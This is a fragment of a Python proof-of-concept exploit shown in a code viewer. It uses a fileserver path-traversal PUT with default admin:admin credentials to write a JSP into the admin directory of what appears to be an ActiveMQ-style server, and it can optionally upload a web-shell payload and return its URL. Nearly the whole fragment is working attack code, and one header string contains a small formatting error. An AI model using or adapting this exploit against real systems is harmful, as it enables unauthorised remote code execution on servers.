(base)
| 19 | |
| 20 | |
| 21 | def poc(base): |
| 22 | base = "http://" + base if '://' not in base else base |
| 23 | name = randomString(5) |
| 24 | uri = '{url}/admin/{name}.jsp'.format(url=base.rstrip('/'), name=name) |
| 25 | target = r'{url}/fileserver/sex../../..\admin/{name}.jsp'.format(url=base.rstrip('/'), name=name) |
| 26 | key = base64.b64encode("admin:admin") |
| 27 | headers = {'Authorization': 'Basic %s}' % key, 'User-Agent': 'Mozilla/5.0 Gecko/20100101 Firefox/45.0'} |
| 28 | put_data = JSP_UPLOAD if ENABLE_EXP else randomString(10) |
| 29 | try: |
| 30 | res1 = requests.put(target, headers=headers, data=put_data, timeout=10) |
| 31 | res2 = requests.get(uri, headers=headers, timeout=10) |
| 32 | if res1.status_code == 204 and res2.status_code == 200: |
| 33 | if ENABLE_EXP: |
| 34 | return uri |
| 35 | return uri if put_data in res2.content else False |
| 36 | except Exception: |
| 37 | return False |
| 38 | return False |
nothing calls this directly
no test coverage detected